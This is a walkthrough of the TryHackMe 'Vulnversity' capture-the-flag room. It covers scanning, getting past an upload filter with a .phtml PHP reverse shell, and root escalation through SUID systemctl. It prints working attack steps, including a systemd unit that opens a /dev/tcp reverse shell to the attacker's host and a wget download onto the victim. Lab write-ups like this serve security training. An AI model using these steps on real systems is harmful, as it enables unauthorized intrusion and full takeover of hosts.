TryHackMe|Vulnversity WriteUp\Walkthrough (English)

vulnversity 

Room Link: https://tryhackme.com/r/room/vulnversity

==============================================================

• sudo nmap IP -vv -Pn we have 6 ports open. Then sudo nmap IP -vv -Pn -A to get more info on the target open ports.
• The proxy is running on port 3128 and its version is 3.5.12.
• OS is Ubuntu and you can get this from the -sV of port 22.
• The web server is running on port 3333.
• gobuster dir -w /usr/share/dirb/wordlists/common.txt -u http://IP:3333/, the directory with the upload form is /internal/.
• Now you want to upload a shell to the website, however, if you try to upload a .php shell the website will give you a message that this type of file is not allowed. You need to try other types of php extensions which are: .php(you need this for reference), .php3, .php4, .php4, .phtml. Take these 5 types of extensions and save them in a file phpext, each extension in a separate line.
• cp /usr/share/webshells/php/php-reverse-shell.php shell.php
• Open burpsuite and turn on intercept and also fix foxyproxy to burpsuite in your browser. Go to the upload page and upload your php shell, then intercept the request.

• To test out the 5 different extensions send this request to the intruder, from there choose the attack type sniper, clear§ and add§ to the extension in the filename. This way the file extension will be the changing value in each request.

• Go to the payloads and upload the list you made phpext, make sure to disable the payload encoding. Now, start the attack.

• Analyse the responses for each request to know which type worked. This is a response for a request that got blocked:

• And this is a response for an accepted one:

Which is the .phtml one.

• Now that you know .phtml is the accepted type change the extension of your shellcode mv shell.php shell.phtml and reupload it to the /internal/ directory.
• Set up a listener nc -nlvp port. To get a shell back to your machine you need to visit your uploaded shell on the website, but where is it? If you look at the request when you uploaded your shell you will find that it is going to /internal/index.php which is the same as/internal/. So, gobuster dir -w /usr/share/dirb/wordlists/common.txt -u http://IP:3333/internal/, this scan gave us /uploads. From there click on shell.phtml to launch your reverse shell (Don’t forget to turn off the proxy :).

• /bin/bash -i then cd /home list the contents of this folder to get the users on this system bill. cd bill then retrieve the user flag✨.
• Now to the privilege escalation. Here it already told you that you can get benefits from the SUID. find / -perm /4000 2>/dev/null. There is the /bin/systemctl binary that you can use to get a root shell. This is an amazing reference https://alvinsmith.gitbook.io/progressive-oscp/untitled/vulnversity-privilege-escalation .

First, you will create your payload at your local machine:

[Unit]

Description=roooooooooot

 

[Service]

Type=simple

User=root

ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/LocalIP/9999 0>&1'

 

[Install]

WantedBy=multi-user.target

Name it as root.service.

• cd /tmp in the victim’s machine. Host a python http server on your machine and using wget download the root.service file into the victim’s machine.
• nc -nlvp 9999 at your machine. on the victim's machine /bin/systemctl enable /tmp/root.service then /bin/systemctl start root. Now you will get a root shell back to the listener on your machine. cd /root and retrieve the flag✨.